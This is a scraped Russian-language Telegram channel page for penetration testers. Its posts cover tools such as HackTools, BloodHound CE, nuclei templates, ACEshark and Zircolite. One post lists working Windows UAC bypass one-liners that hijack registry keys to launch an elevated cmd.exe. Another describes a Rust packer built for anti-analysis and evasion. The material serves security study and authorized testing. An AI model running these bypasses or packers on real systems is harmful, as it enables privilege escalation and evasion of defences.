Whitehat Lab
2.12K subscribers
344 photos
393 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
Channel created
⚙️ Reserved for future use

⚠️ Disclaimer:

Вся публикуемая информация предоставляется исключительно в образовательных целях!
За противозаконные действия может грозить уголовная ответственность согласно законодательству вашей страны.


#nav

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
Hetty 0.7.0

Это инструментарий по работе с HTTP, позиционирует себя как альтернатива 😈 Burp. Функционала конечно меньше, зато free и opensource. Написан на 💻 Go

💻 Home
💻 Download

#hetty #soft #golang

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🌐 HackTools v0.5.0

Отличное универсальное расширение для веб пентеста

💻 Chromium based browsers:

➡️ Webstore

💻 Firefox:

➡️ Addons

Возможности:

▪️ Dynamic Reverse Shell generator
▪️ Shell Spawning
▪️ MSF Venom Builder
▪️ XSS Payloads
▪️ Basic SQLi payloads
▪️ Local file inclusion payloads (LFI)
▪️ Data Encoding
▪️ Obfuscated Files
▪️ Hash Generator
▪️ Useful Linux commands


💻 Home

#hacktools #browser #extension

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🎃 Abusing multicast poisoning for pre-authenticated Kerberos relay over HTTP with Responder and krbrelayx

Relay через отравление LLMNR - research

😹 Krbrelayx
😹 Responder

#redteam #krbrelayx #llmnr #pentest #responder #relay

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔎 nuclei poc

Приветствую друзья!

В очередных поисках всякого интересного на просторах нашего необъятного интернета нашел отличный репозиторий от наших китайских товарищей с огромным количеством шаблонов для nuclei
Обновляется на ежедневной основе с помощью Github Actions и содержит более 110k! шаблонов. В файле repo.csv указаны источники для обновлений

Все шаблоны разбиты по категориям и вендорам

Установка:

git clone https://github.com/adysec/nuclei_poc
cd nuclei_poc


Примеры:

nuclei -t poc/ -u https://example.com

nuclei -t poc/web/ -u https://example.com

nuclei -t poc/wordpress/ -u https://example.com


😹 Home
😹 Eng. version

#nuclei #pentest #web #poc

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔓 UAC bypass oneliners

eventvwr.exe
reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f && reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start cmd" /f && eventvwr.exe


fodhelper.exe
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "cmd.exe" && start fodhelper.exe


sdclt.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe /ve /t REG_SZ /d "cmd.exe" /f && start sdclt.exe


slui.exe
reg add HKCU\Software\Classes\exefile\shell\open\command /ve /t REG_SZ /d "cmd.exe" /f && reg add HKCU\Software\Classes\exefile\shell\open\command /v DelegateExecute /f && start slui.exe


perfmon.exe
reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f && reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start cmd" /f && start perfmon.exe


taskmgr.exe
reg add HKCU\Software\Classes\taskmgr\shell\open\command /ve /t REG_SZ /d "cmd.exe" /f && start taskmgr.exe


ComputerDefaults.exe
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "cmd.exe" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && start computerdefaults.exe


sysprep.exe
reg add HKCU\Software\Classes\AppID\{921C1A8B-9F15-4DA4-9235-0472C3A216E6} /f /ve /t REG_SZ /d "cmd.exe" && start C:\Windows\System32\sysprep\sysprep.exe


control.exe
cmd /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /ve /d "cmd.exe" /f && control.exe /computername


Сброс:
reg delete "HKCU\Software\Classes\mscfile\shell\open\command" /f
reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
reg delete "HKCU\Software\Classes\exefile\shell\open\command" /f
reg delete "HKCU\Software\Classes\taskmgr\shell\open\command" /f
reg delete "HKCU\Software\Classes\AppID{921C1A8B-9F15-4DA4-9235-0472C3A216E6}" /f


#uac #bypass #windows

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️ ACEshark

Инструмент пост эксплуатации 💻Windows хостов для определения модифицируемых служб и ACL файлов

Установка:
git clone https://github.com/t3l3machus/ACEshark

cd ACEshark
pip3 install -r requirements.txt


Зависимости:
sudo apt-get install xclip
sudo apt-get install xselect


Запуск:
python3 ./ACEshark.py -s 10.10.1.10 -i

# Полученный скрипт выполняем на удаляемом хосте


🖥 Home

#soft #python #acrshark

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔐 Rusty-PE-Packer

Пакер исполняемых 🪟 Windows файлов написанный на 💻 Rust

Особенности:

Анти отладка
Анти анализ
Кастомное шифрование
Использование легитимного процесса (explorer по умолчанию)


Установка и запуск:

cd Launcher
cargo build --release
cd Packit
cargo build --release

Packit.exe <EXE_to_Pack> <Launcher.exe>


🖥 Home

#soft #rust #packer

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄😉 BloodHound CE v7.2.0

Обновление инструмента для выявления связей и построения графов в 💻 Active Directory. Достаточно учетной записи доменного пользователя.
Отличный инструмент при пентесте 🏠 AD среды.
Для сбора информации используются коллекторы bloodhound-ce или SharpHound

Установка:

curl -L https://ghst.ly/getbhce | docker compose -f - up

https://localhost:8080/ui/login


Логин admin и сгенерированный пароль

Для обновления переходим в директорию с docker-compose.yml и запускаем:

docker compose pull && docker compose up


Сбор информации:

python3 bloodhound-python -u domain_user -p 'P@ss' -ns 10.0.0.1 -d contoso.com -c all --dns-tcp


Neo4j запросы:

# Domain Admins и время установки пароля
MATCH (g:Group) WHERE g.name =~ "(?i).*DOMAIN ADMINS.*" WITH g MATCH (g)<-
[r:MemberOf*1..]-(u) RETURN u.name AS User,
datetime({epochSeconds:toInteger(u.pwdlastset)}) as passwordLastSet, datetime({epochSeconds: toInteger(u.whencreated)}) AS dateCreated ORDER BY u.pwdlastset


# Сервисные УЗ, время установки пароля, дата создания
MATCH (u:User) WHERE u.hasspn=true AND (NOT u.name STARTS WITH 'KRBTGT') RETURN u.name
AS accountName, datetime({epochSeconds: toInteger(u.pwdlastset)}) AS passwordLastSet,
datetime({epochSeconds: toInteger(u.whencreated)}) AS dateCreated ORDER BY u.pwdlastset


# Пользователи и описание
MATCH (u:User) RETURN u.name as username, u.description as description


# Domain Admins или Administrators с сессией исключая DC
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH
COLLECT(c1.name) AS domainControllers
MATCH (n:User)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-512' OR
g.objectid ENDS WITH '-544'
MATCH p = (c:Computer)-[:HasSession]->(n) WHERE NOT c.name in domainControllers return
p


# Неограниченное делегирование исключая DC
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH
COLLECT(c1.name) AS domainControllers
MATCH (c:Computer {unconstraineddelegation:true}) WHERE NOT c.name IN domainControllers
RETURN c


# Пользователи с ограниченным делегированием
MATCH p = ((u:User)-[r:AllowedToDelegate]->(c:Computer)) RETURN p


Подробный гайд
:

➡️ The Ultimate Guide BHCE
➡️ Адаптация на русском

ADCS атаки:

➡️ Part 1
➡️ Part 2
➡️ Part 3

Ссылки:

💻 Home
💻 Download
➡️ Docs

#bloodhound #pentest #active_directory #soft #bhce

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 🔍 Zircolite v2.30.1

Отличный инструмент для исследования логов, особенно крайне кривых и неудобных 💻 Windows EVTX
Проводит анализ на основе SIGMA правил (основные идут в комплекте)
Также работает с файлами .log, .xml, .json

⚙️ Установка:

git clone https://github.com/wagga40/Zircolite

cd Zircolite

pip3 install -r requirements.full.txt


Для WIndows есть собранный бинарь

Примеры:

python3 zircolite.py --evtx system.evtx

python3 zircolite.py --evtx system.evtx --ruleset rules/rules_windows_sysmon_pysigma.json

python3 zircolite.py --events auditd.log --ruleset rules/rules_linux.json --auditd

python3 zircolite.py --events sysmon.log --ruleset rules/rules_linux.json --sysmon4linux


Обновление правил:

python3 zircolite.py -U


🗂 Тестовый EVTX

💻 Home
💻 Sigma
📔 Documentation

#dfir #forensics #zircolite #soft #python

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 📞 uutils coreutils 0.0.30

Это кроссплатформенная реализация GNU coreutils переписанная на Rust

Реализовано более 100 утилит. Проект стремится работать на как можно большем количестве платформ, чтобы иметь возможность использовать одни и те же утилиты на 🐧 Linux, 💻 Mac, 💻 Windows и других платформах. Это гарантирует, что скрипты могут быть легко перенесены между платформами

cargo install coreutils
~/.cargo/bin/coreutils


Установка via 💻 winget:

winget install uutils.coreutils


💻 Project
💬 Docs
🖥 Install

#coreutils #soft #rust

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM